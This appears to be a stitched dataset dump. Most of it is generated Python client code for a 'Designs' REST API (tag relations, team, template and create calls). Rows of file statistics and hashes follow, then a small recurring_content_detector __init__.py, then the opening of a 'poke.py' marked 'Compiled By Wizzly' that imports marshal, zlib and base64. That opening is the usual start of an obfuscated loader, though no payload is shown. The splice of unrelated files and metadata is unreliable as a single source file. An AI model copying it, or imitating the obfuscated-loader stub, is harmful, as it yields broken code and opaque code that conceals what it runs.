kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_tags_delete_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_tags_delete_with_http_info(id, **kwargs)
return data
def designs_id_tags_delete_with_http_info(self, id, **kwargs):
"""
Deletes all tags of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_delete_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_tags_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_tags_delete`")
collection_formats = {}
resource_path = '/Designs/{id}/tags'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_tags_fk_delete(self, id, fk, **kwargs):
"""
Delete a related item by id for tags.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_fk_delete(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for tags (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_tags_fk_delete_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_tags_fk_delete_with_http_info(id, fk, **kwargs)
return data
def designs_id_tags_fk_delete_with_http_info(self, id, fk, **kwargs):
"""
Delete a related item by id for tags.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_fk_delete_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for tags (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_tags_fk_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_tags_fk_delete`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_tags_fk_delete`")
collection_formats = {}
resource_path = '/Designs/{id}/tags/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_tags_fk_get(self, id, fk, **kwargs):
"""
Find a related item by id for tags.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_fk_get(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for tags (required)
:return: Tag
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_tags_fk_get_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_tags_fk_get_with_http_info(id, fk, **kwargs)
return data
def designs_id_tags_fk_get_with_http_info(self, id, fk, **kwargs):
"""
Find a related item by id for tags.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_fk_get_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for tags (required)
:return: Tag
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_tags_fk_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_tags_fk_get`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_tags_fk_get`")
collection_formats = {}
resource_path = '/Designs/{id}/tags/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Tag',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_tags_fk_put(self, id, fk, **kwargs):
"""
Update a related item by id for tags.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_fk_put(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for tags (required)
:param Tag data:
:return: Tag
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_tags_fk_put_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_tags_fk_put_with_http_info(id, fk, **kwargs)
return data
def designs_id_tags_fk_put_with_http_info(self, id, fk, **kwargs):
"""
Update a related item by id for tags.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_fk_put_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for tags (required)
:param Tag data:
:return: Tag
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_tags_fk_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_tags_fk_put`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_tags_fk_put`")
collection_formats = {}
resource_path = '/Designs/{id}/tags/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Tag',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_tags_get(self, id, **kwargs):
"""
Queries tags of Design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str filter:
:return: list[Tag]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_tags_get_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_tags_get_with_http_info(id, **kwargs)
return data
def designs_id_tags_get_with_http_info(self, id, **kwargs):
"""
Queries tags of Design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str filter:
:return: list[Tag]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'filter']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_tags_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_tags_get`")
collection_formats = {}
resource_path = '/Designs/{id}/tags'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'filter' in params:
query_params['filter'] = params['filter']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Tag]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_tags_post(self, id, **kwargs):
"""
Creates a new instance in tags of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_post(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param Tag data:
:return: Tag
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_tags_post_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_tags_post_with_http_info(id, **kwargs)
return data
def designs_id_tags_post_with_http_info(self, id, **kwargs):
"""
Creates a new instance in tags of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_post_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param Tag data:
:return: Tag
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_tags_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_tags_post`")
collection_formats = {}
resource_path = '/Designs/{id}/tags'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Tag',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_tags_rel_fk_delete(self, id, fk, **kwargs):
    """Remove the tags relation to an item by id.

    Synchronous by default; pass a callable ``callback`` kwarg to perform
    the request asynchronously, in which case the request thread is
    returned instead of the response data.

    :param str id: Design id (required)
    :param str fk: Foreign key for tags (required)
    :return: None
    """
    # Ask the raw variant for just the payload (not the full
    # (data, status, headers) tuple); its result — payload or async
    # thread — is exactly what this convenience wrapper returns.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_tags_rel_fk_delete_with_http_info(id, fk, **kwargs)
def designs_id_tags_rel_fk_delete_with_http_info(self, id, fk, **kwargs):
    """Remove the tags relation to an item by id (raw HTTP variant).

    Synchronous by default; pass a callable ``callback`` kwarg to perform
    the request asynchronously (the request thread is then returned).

    :param str id: Design id (required)
    :param str fk: Foreign key for tags (required)
    :return: None
    """
    allowed = {'id', 'fk', 'callback', '_return_http_data_only'}
    params = {'id': id, 'fk': fk}
    for name in kwargs:
        if name not in allowed:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_tags_rel_fk_delete" % name
            )
        params[name] = kwargs[name]
    # Validate required path parameters.
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_tags_rel_fk_delete`")
    if params.get('fk') is None:
        raise ValueError("Missing the required parameter `fk` when calling `designs_id_tags_rel_fk_delete`")

    # Negotiate headers; an empty Accept is simply omitted.
    header_params = {}
    accept = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/Designs/{id}/tags/rel/{fk}'.replace('{format}', 'json'), 'DELETE',
        {'id': params['id'], 'fk': params['fk']},  # path params
        {},                                        # query params
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type=None,
        auth_settings=['access_token'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        collection_formats={})
def designs_id_tags_rel_fk_head(self, id, fk, **kwargs):
    """Check the existence of tags relation to an item by id.

    Synchronous by default; pass a callable ``callback`` kwarg to perform
    the request asynchronously, in which case the request thread is
    returned instead of the response data.

    :param str id: Design id (required)
    :param str fk: Foreign key for tags (required)
    :return: bool
    """
    # Ask the raw variant for just the payload; its result — payload or
    # async thread — is exactly what this convenience wrapper returns.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_tags_rel_fk_head_with_http_info(id, fk, **kwargs)
def designs_id_tags_rel_fk_head_with_http_info(self, id, fk, **kwargs):
    """Check the existence of tags relation to an item by id (raw HTTP variant).

    Synchronous by default; pass a callable ``callback`` kwarg to perform
    the request asynchronously (the request thread is then returned).

    :param str id: Design id (required)
    :param str fk: Foreign key for tags (required)
    :return: bool
    """
    allowed = {'id', 'fk', 'callback', '_return_http_data_only'}
    params = {'id': id, 'fk': fk}
    for name in kwargs:
        if name not in allowed:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_tags_rel_fk_head" % name
            )
        params[name] = kwargs[name]
    # Validate required path parameters.
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_tags_rel_fk_head`")
    if params.get('fk') is None:
        raise ValueError("Missing the required parameter `fk` when calling `designs_id_tags_rel_fk_head`")

    # Negotiate headers; an empty Accept is simply omitted.
    header_params = {}
    accept = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/Designs/{id}/tags/rel/{fk}'.replace('{format}', 'json'), 'HEAD',
        {'id': params['id'], 'fk': params['fk']},  # path params
        {},                                        # query params
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='bool',
        auth_settings=['access_token'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        collection_formats={})
def designs_id_tags_rel_fk_put(self, id, fk, **kwargs):
    """Add a related item by id for tags.

    Synchronous by default; pass a callable ``callback`` kwarg to perform
    the request asynchronously, in which case the request thread is
    returned instead of the response data.

    :param str id: Design id (required)
    :param str fk: Foreign key for tags (required)
    :param DesignTag data:
    :return: DesignTag
    """
    # Ask the raw variant for just the payload; its result — payload or
    # async thread — is exactly what this convenience wrapper returns.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_tags_rel_fk_put_with_http_info(id, fk, **kwargs)
def designs_id_tags_rel_fk_put_with_http_info(self, id, fk, **kwargs):
    """Add a related item by id for tags (raw HTTP variant).

    Synchronous by default; pass a callable ``callback`` kwarg to perform
    the request asynchronously (the request thread is then returned).

    :param str id: Design id (required)
    :param str fk: Foreign key for tags (required)
    :param DesignTag data:
    :return: DesignTag
    """
    allowed = {'id', 'fk', 'data', 'callback', '_return_http_data_only'}
    params = {'id': id, 'fk': fk}
    for name in kwargs:
        if name not in allowed:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_tags_rel_fk_put" % name
            )
        params[name] = kwargs[name]
    # Validate required path parameters.
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_tags_rel_fk_put`")
    if params.get('fk') is None:
        raise ValueError("Missing the required parameter `fk` when calling `designs_id_tags_rel_fk_put`")

    # Optional request body (the DesignTag payload).
    body = params['data'] if 'data' in params else None

    # Negotiate headers; an empty Accept is simply omitted.
    header_params = {}
    accept = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/Designs/{id}/tags/rel/{fk}'.replace('{format}', 'json'), 'PUT',
        {'id': params['id'], 'fk': params['fk']},  # path params
        {},                                        # query params
        header_params,
        body=body,
        post_params=[],
        files={},
        response_type='DesignTag',
        auth_settings=['access_token'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        collection_formats={})
def designs_id_team_get(self, id, **kwargs):
    """Fetches belongsTo relation team.

    Synchronous by default; pass a callable ``callback`` kwarg to perform
    the request asynchronously, in which case the request thread is
    returned instead of the response data.

    :param str id: Design id (required)
    :param bool refresh:
    :return: Team
    """
    # Ask the raw variant for just the payload; its result — payload or
    # async thread — is exactly what this convenience wrapper returns.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_team_get_with_http_info(id, **kwargs)
def designs_id_team_get_with_http_info(self, id, **kwargs):
    """Fetches belongsTo relation team (raw HTTP variant).

    Synchronous by default; pass a callable ``callback`` kwarg to perform
    the request asynchronously (the request thread is then returned).

    :param str id: Design id (required)
    :param bool refresh:
    :return: Team
    """
    allowed = {'id', 'refresh', 'callback', '_return_http_data_only'}
    params = {'id': id}
    for name in kwargs:
        if name not in allowed:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_team_get" % name
            )
        params[name] = kwargs[name]
    # Validate the required path parameter.
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_team_get`")

    # Forward `refresh` only when the caller supplied it (even if None).
    query_params = {}
    if 'refresh' in params:
        query_params['refresh'] = params['refresh']

    # Negotiate headers; an empty Accept is simply omitted.
    header_params = {}
    accept = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/Designs/{id}/team'.replace('{format}', 'json'), 'GET',
        {'id': params['id']},  # path params
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='Team',
        auth_settings=['access_token'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        collection_formats={})
def designs_id_template_get(self, id, **kwargs):
    """Fetches belongsTo relation template.

    Synchronous by default; pass a callable ``callback`` kwarg to perform
    the request asynchronously, in which case the request thread is
    returned instead of the response data.

    :param str id: Design id (required)
    :param bool refresh:
    :return: Template
    """
    # Ask the raw variant for just the payload; its result — payload or
    # async thread — is exactly what this convenience wrapper returns.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_template_get_with_http_info(id, **kwargs)
def designs_id_template_get_with_http_info(self, id, **kwargs):
    """Fetches belongsTo relation template (raw HTTP variant).

    Synchronous by default; pass a callable ``callback`` kwarg to perform
    the request asynchronously (the request thread is then returned).

    :param str id: Design id (required)
    :param bool refresh:
    :return: Template
    """
    allowed = {'id', 'refresh', 'callback', '_return_http_data_only'}
    params = {'id': id}
    for name in kwargs:
        if name not in allowed:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_template_get" % name
            )
        params[name] = kwargs[name]
    # Validate the required path parameter.
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_template_get`")

    # Forward `refresh` only when the caller supplied it (even if None).
    query_params = {}
    if 'refresh' in params:
        query_params['refresh'] = params['refresh']

    # Negotiate headers; an empty Accept is simply omitted.
    header_params = {}
    accept = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/Designs/{id}/template'.replace('{format}', 'json'), 'GET',
        {'id': params['id']},  # path params
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='Template',
        auth_settings=['access_token'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        collection_formats={})
def designs_post(self, **kwargs):
    """Create a new instance of the model and persist it into the data source.

    Synchronous by default; pass a callable ``callback`` kwarg to perform
    the request asynchronously, in which case the request thread is
    returned instead of the response data.

    :param Design data: Model instance data
    :return: Design
    """
    # Ask the raw variant for just the payload; its result — payload or
    # async thread — is exactly what this convenience wrapper returns.
    kwargs['_return_http_data_only'] = True
    return self.designs_post_with_http_info(**kwargs)
def designs_post_with_http_info(self, **kwargs):
    """Create a new instance of the model and persist it into the data source
    (raw HTTP variant).

    Synchronous by default; pass a callable ``callback`` kwarg to perform
    the request asynchronously (the request thread is then returned).

    :param Design data: Model instance data
    :return: Design
    """
    allowed = {'data', 'callback', '_return_http_data_only'}
    params = {}
    for name in kwargs:
        if name not in allowed:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_post" % name
            )
        params[name] = kwargs[name]

    # Optional request body (the Design payload).
    body = params['data'] if 'data' in params else None

    # Negotiate headers; an empty Accept is simply omitted.
    header_params = {}
    accept = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/Designs'.replace('{format}', 'json'), 'POST',
        {},  # path params
        {},  # query params
        header_params,
        body=body,
        post_params=[],
        files={},
        response_type='Design',
        auth_settings=['access_token'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        collection_formats={})
| 41.21104
| 165
| 0.559737
| 43,400
| 418,086
| 5.170507
| 0.007074
| 0.063458
| 0.02221
| 0.028556
| 0.993561
| 0.992242
| 0.991404
| 0.98709
| 0.984577
| 0.979817
| 0
| 0.000651
| 0.352954
| 418,086
| 10,144
| 166
| 41.215103
| 0.82886
| 0.304394
| 0
| 0.850197
| 0
| 0
| 0.187662
| 0.06983
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037191
| false
| 0
| 0.001454
| 0
| 0.094328
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3df24bc9e6a96e12009692b63b381a4d5506bada
| 98
|
py
|
Python
|
recurring_content_detector/__init__.py
|
lcd1232/recurring-content-detector
|
31e502e16b0d9870a6e3e4eb3bfe93d058cd01b0
|
[
"MIT"
] | 46
|
2019-06-12T10:43:47.000Z
|
2022-03-15T12:17:13.000Z
|
recurring_content_detector/__init__.py
|
lcd1232/recurring-content-detector
|
31e502e16b0d9870a6e3e4eb3bfe93d058cd01b0
|
[
"MIT"
] | 19
|
2020-01-20T09:26:39.000Z
|
2021-12-10T13:16:08.000Z
|
recurring_content_detector/__init__.py
|
lcd1232/recurring-content-detector
|
31e502e16b0d9870a6e3e4eb3bfe93d058cd01b0
|
[
"MIT"
] | 14
|
2020-01-05T21:04:28.000Z
|
2022-02-21T08:51:04.000Z
|
from . import detector
def detect(*args, **kwargs):
    """Package-level convenience entry point.

    Forwards every positional and keyword argument unchanged to
    ``detector.detect`` and returns its result.
    """
    result = detector.detect(*args, **kwargs)
    return result
| 16.333333
| 43
| 0.683673
| 12
| 98
| 5.583333
| 0.666667
| 0.298507
| 0.477612
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.163265
| 98
| 5
| 44
| 19.6
| 0.817073
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 9
|
9a7d76659b7e05a8f243d269b95b2bce2cbcf5d7
| 894
|
py
|
Python
|
poke.py
|
Wizzly0/RelaxsTeam
|
37e294a34b34279afe6290668b753716cca37cf0
|
[
"Apache-2.0"
] | null | null | null |
poke.py
|
Wizzly0/RelaxsTeam
|
37e294a34b34279afe6290668b753716cca37cf0
|
[
"Apache-2.0"
] | null | null | null |
poke.py
|
Wizzly0/RelaxsTeam
|
37e294a34b34279afe6290668b753716cca37cf0
|
[
"Apache-2.0"
] | null | null | null |
#Compiled By Wizzly
import marshal,zlib,base64
